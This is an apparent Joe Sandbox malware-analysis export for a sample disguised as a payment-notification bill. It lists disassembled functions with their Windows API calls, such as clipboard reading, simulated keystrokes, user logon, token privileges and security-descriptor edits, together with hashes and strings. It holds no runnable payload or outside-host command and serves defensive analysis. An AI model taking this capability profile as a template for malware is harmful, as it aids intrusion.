Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 23d56db177c32b5e78b96f0b89fbd678b0cc3da2375502f27194c18e6b2fe9c1
Instruction ID: ca51e2242a9ba4596f7ea85d6db6aeccfe885bf89c32f0bbdc503813700dc767
Opcode Fuzzy Hash: 23d56db177c32b5e78b96f0b89fbd678b0cc3da2375502f27194c18e6b2fe9c1
Instruction Fuzzy Hash: 8CD06C3205410DBBDF028F84DD06EDA3BAAFB48714F014050BE1856020C732E861AB90

Function 008E1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 008E1CBC

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: bd322b9f4781a78235aacfa149bd94f55be3f84a0d6e011b67cb6d739b3dffba
Instruction ID: 74923f206605c51bd60fe1e2105ea1e383ee658d0192f30e55ccf7ab100116ee
Opcode Fuzzy Hash: bd322b9f4781a78235aacfa149bd94f55be3f84a0d6e011b67cb6d739b3dffba
Instruction Fuzzy Hash: 39C09B3629C3049FF3144780BD5EF107754E348B10F444101F60D555E3D3E22450F750

Function 0095744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 008E5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,008E949C,?,00008000), ref: 008E5773

GetLastError.KERNEL32(00000002,00000000), ref: 009576DE

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 025bb9fc3c0812e9cd6337ab3534c2a78979b0ce98f8ae7114a189a0045ffce0
Instruction ID: 81e4417a55c5852bcfe8540d69538b788d923b68f3e746cdbae4b47817c93c45
Opcode Fuzzy Hash: 025bb9fc3c0812e9cd6337ab3534c2a78979b0ce98f8ae7114a189a0045ffce0
Instruction Fuzzy Hash: 5C81C0302087419FC714EF69D491A69B7E5FF8A314F04451CF8969B2A2DB70EE49CB93

Function 008E6246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,00000000,009224E0), ref: 008E6266

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b6ef975268ffcc0118a8ec83fd535d61f73ea44d6edaff9bc0952bd64e2f26ff
Instruction ID: 6c5260a8e03e5321fcb591ab561b5b00eddf51da6ff8de64beaccbba1bebecf2
Opcode Fuzzy Hash: b6ef975268ffcc0118a8ec83fd535d61f73ea44d6edaff9bc0952bd64e2f26ff
Instruction Fuzzy Hash: 71E0B675400B01CFD3314F1BE804412FBF5FFE23A13204A2ED1E592660E3B058969F51

Function 041BF510 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 041BF521

Memory Dump Source

Source File: 00000000.00000002.1707992061.00000000041BD000.00000040.00000020.00020000.00000000.sdmp, Offset: 041BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41bd000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 198dce1ecc5270ef9cf28673f189aee4510341aa80a11c53b9e7420c4f1efa40
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: DFE0BF7494010D9FDB00EFA8D9496DE7BB4EF04301F1045A1FD01D2281D7309A508A62

Non-executed Functions

Function 00979576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0097961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0097965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0097969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009796C9
SendMessageW.USER32 ref: 009796F2
GetKeyState.USER32(00000011), ref: 0097978B
GetKeyState.USER32(00000009), ref: 00979798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009797AE
GetKeyState.USER32(00000010), ref: 009797B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009797E9
SendMessageW.USER32 ref: 00979810
SendMessageW.USER32(?,00001030,?,00977E95), ref: 00979918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0097992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00979941
SetCapture.USER32(?), ref: 0097994A
ClientToScreen.USER32(?,?), ref: 009799AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 009799BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009799D6
ReleaseCapture.USER32 ref: 009799E1
GetCursorPos.USER32(?), ref: 00979A19
ScreenToClient.USER32(?,?), ref: 00979A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00979A80
SendMessageW.USER32 ref: 00979AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00979AEB
SendMessageW.USER32 ref: 00979B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00979B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00979B4A
GetCursorPos.USER32(?), ref: 00979B68
ScreenToClient.USER32(?,?), ref: 00979B75
GetParent.USER32(?), ref: 00979B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00979BFA
SendMessageW.USER32 ref: 00979C2B
ClientToScreen.USER32(?,?), ref: 00979C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00979CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00979CDE
SendMessageW.USER32 ref: 00979D01
ClientToScreen.USER32(?,?), ref: 00979D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00979D82

Part of subcall function 008F9944: GetWindowLongW.USER32(?,000000EB), ref: 008F9952

GetWindowLongW.USER32(?,000000F0), ref: 00979E05

Strings

F, xrefs: 00979D07
@GUI_DRAGID, xrefs: 0097997D

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F
API String ID: 3429851547-4164748364
Opcode ID: f94e40c06a037ab1a7e0d37c8400a7d5ab54f825d0193d0e1683d850adc0de19
Instruction ID: e019a6dcb2e108706d1d2e8040a9117aa28c5f2e469d63916f2fdb9115613a5d
Opcode Fuzzy Hash: f94e40c06a037ab1a7e0d37c8400a7d5ab54f825d0193d0e1683d850adc0de19
Instruction Fuzzy Hash: 07429F72208241AFD724CF28CC84EAABBE9FF49724F14861DF69D872A1D731E850DB51

Function 00974873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 009748F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00974908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00974927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0097494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0097495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0097497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 009749AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 009749D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00974A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00974A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00974A7E
IsMenu.USER32(?), ref: 00974A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00974AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00974B20
GetWindowLongW.USER32(?,000000F0), ref: 00974B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00974BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00974C82
wsprintfW.USER32 ref: 00974CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00974CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00974CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00974D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00974D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00974D5A

Strings

%d/%02d/%02d, xrefs: 00974CA8

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: aeeefec0cf1f15ef828e09c922625e4e859521ec7bf1356fcc05e3e9998fbbbd
Instruction ID: f903ff482444356f82bb6a63bc460559fce8aa3f1ab6b89e814dd0ac2b6d8af2
Opcode Fuzzy Hash: aeeefec0cf1f15ef828e09c922625e4e859521ec7bf1356fcc05e3e9998fbbbd
Instruction Fuzzy Hash: F512D172600259ABEB258F28CC49FAE7BF8FF85710F108529F51ADB2E2D7749941CB50

Function 008FF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 008FF998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0093F474
IsIconic.USER32(00000000), ref: 0093F47D
ShowWindow.USER32(00000000,00000009), ref: 0093F48A
SetForegroundWindow.USER32(00000000), ref: 0093F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0093F4AA
GetCurrentThreadId.KERNEL32 ref: 0093F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0093F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0093F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0093F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0093F4DE
SetForegroundWindow.USER32(00000000), ref: 0093F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0093F4F6
keybd_event.USER32(00000012,00000000), ref: 0093F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0093F50B
keybd_event.USER32(00000012,00000000), ref: 0093F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0093F519
keybd_event.USER32(00000012,00000000), ref: 0093F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0093F528
keybd_event.USER32(00000012,00000000), ref: 0093F52D
SetForegroundWindow.USER32(00000000), ref: 0093F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0093F557

Strings

Shell_TrayWnd, xrefs: 0093F46F

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: d320d4174f145755e38b8fe2960bd7909d99b7ede16ccf82983d3571542e674a
Instruction ID: b1bd0d4e5a3bbf9f520df1b4909ad01dd5e1fdb025e210e326d5bef981a8d6da
Opcode Fuzzy Hash: d320d4174f145755e38b8fe2960bd7909d99b7ede16ccf82983d3571542e674a
Instruction Fuzzy Hash: F73154B2E54218BBEB206BB55C4AFBF7E6CEB44B50F100469F605EA1D1C6B15D40BE60

Function 00941201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 009416C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0094170D
Part of subcall function 009416C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0094173A
Part of subcall function 009416C3: GetLastError.KERNEL32 ref: 0094174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00941286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 009412A8
CloseHandle.KERNEL32(?), ref: 009412B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009412D1
GetProcessWindowStation.USER32 ref: 009412EA
SetProcessWindowStation.USER32(00000000), ref: 009412F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00941310

Part of subcall function 009410BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009411FC), ref: 009410D4
Part of subcall function 009410BF: CloseHandle.KERNEL32(?,?,009411FC), ref: 009410E9

Strings

winsta0, xrefs: 009412CC
default, xrefs: 0094130B
, xrefs: 0094125A

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: b6782fad9009e8b5bd5cf7e9370b9637d8e47b0e45e1d13b5958c82b1afb1fc9
Instruction ID: 58698ff75fdb97ed078b3c8e341eb587243f3ff4aff9026a33b1df1472d30973
Opcode Fuzzy Hash: b6782fad9009e8b5bd5cf7e9370b9637d8e47b0e45e1d13b5958c82b1afb1fc9
Instruction Fuzzy Hash: 00819AB2A00209AFDF209FA4DC49FEE7BBDEF44704F144129FA14E62A0D7349984DB65

Function 00940B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009410F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00941114
Part of subcall function 009410F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941120
Part of subcall function 009410F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 0094112F
Part of subcall function 009410F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941136
Part of subcall function 009410F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0094114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00940BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00940C00
GetLengthSid.ADVAPI32(?), ref: 00940C17
GetAce.ADVAPI32(?,00000000,?), ref: 00940C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00940C6D
GetLengthSid.ADVAPI32(?), ref: 00940C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00940C8C
HeapAlloc.KERNEL32(00000000), ref: 00940C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00940CB4
CopySid.ADVAPI32(00000000), ref: 00940CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00940CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00940D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00940D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940D45
HeapFree.KERNEL32(00000000), ref: 00940D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940D55
HeapFree.KERNEL32(00000000), ref: 00940D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940D65
HeapFree.KERNEL32(00000000), ref: 00940D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00940D78
HeapFree.KERNEL32(00000000), ref: 00940D7F

Part of subcall function 00941193: GetProcessHeap.KERNEL32(00000008,00940BB1,?,00000000,?,00940BB1,?), ref: 009411A1
Part of subcall function 00941193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00940BB1,?), ref: 009411A8
Part of subcall function 00941193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00940BB1,?), ref: 009411B7

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: bde58ccd98b4c9fcfd621da9ac379409994c1109fd24a15bac70298f654c8276
Instruction ID: bd1159240d0415ea3bd1097e988bec0e61d8e110279b4679fb9d4f49d495d3cf
Opcode Fuzzy Hash: bde58ccd98b4c9fcfd621da9ac379409994c1109fd24a15bac70298f654c8276
Instruction Fuzzy Hash: 44716EB290420AABDF10DFE4DC45FAEBBBCBF84300F044529EA18A7191D771A945CBA0

Function 0095EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0097CC08), ref: 0095EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0095EB37
GetClipboardData.USER32(0000000D), ref: 0095EB43
CloseClipboard.USER32 ref: 0095EB4F
GlobalLock.KERNEL32(00000000), ref: 0095EB87
CloseClipboard.USER32 ref: 0095EB91
GlobalUnlock.KERNEL32(00000000), ref: 0095EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0095EBC9
GetClipboardData.USER32(00000001), ref: 0095EBD1
GlobalLock.KERNEL32(00000000), ref: 0095EBE2
GlobalUnlock.KERNEL32(00000000), ref: 0095EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0095EC38
GetClipboardData.USER32(0000000F), ref: 0095EC44
GlobalLock.KERNEL32(00000000), ref: 0095EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0095EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0095EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0095ECD2
GlobalUnlock.KERNEL32(00000000), ref: 0095ECF3
CountClipboardFormats.USER32 ref: 0095ED14
CloseClipboard.USER32 ref: 0095ED59

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: c1e22c477e6c303bd30532d51c41976f01306c200b4adf181fa3ba9cf2560b9b
Instruction ID: aeede31ff343e18d112ee79684afe52225fe84e8a679869ef18ae32dbe32cce2
Opcode Fuzzy Hash: c1e22c477e6c303bd30532d51c41976f01306c200b4adf181fa3ba9cf2560b9b
Instruction Fuzzy Hash: 7761D1752082029FD304EF26D889F2A77A8FF84705F14451DF85AC72A2DB72DE49DB62

Function 0095698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 009569BE
FindClose.KERNEL32(00000000), ref: 00956A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00956A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00956A75

Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00956AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00956ADF

Strings

%4d%02d%02d%02d%02d%02d%03d, xrefs: 00956B32
%4d%02d%02d%02d%02d%02d, xrefs: 00956B6A
%02d, xrefs: 00956C00, 00956C0A, 00956C5A, 00956CAA, 00956CFA, 00956D4A
%4d, xrefs: 00956BB1
%03d, xrefs: 00956DA2

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: ba574341eb3bf1d525d3112fc2fc5ace05da53167d5fc8005dcf5fe188a23e3a
Instruction ID: d0fe218a08402e98e54c4fbe6c4ce9498ea3d8539b023c952c8c45a03cdc0d86
Opcode Fuzzy Hash: ba574341eb3bf1d525d3112fc2fc5ace05da53167d5fc8005dcf5fe188a23e3a
Instruction Fuzzy Hash: 30D13E72508340AAC710EBA5C882EABB7ECFF99704F44491DF995C7191EB74DA48CB63

Function 00959642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00959663
GetFileAttributesW.KERNEL32(?), ref: 009596A1
SetFileAttributesW.KERNEL32(?,?), ref: 009596BB
FindNextFileW.KERNEL32(00000000,?), ref: 009596D3
FindClose.KERNEL32(00000000), ref: 009596DE
FindFirstFileW.KERNEL32(*.*,?), ref: 009596FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0095974A
SetCurrentDirectoryW.KERNEL32(009A6B7C), ref: 00959768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00959772
FindClose.KERNEL32(00000000), ref: 0095977F
FindClose.KERNEL32(00000000), ref: 0095978F

Strings

*.*, xrefs: 009596F5

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
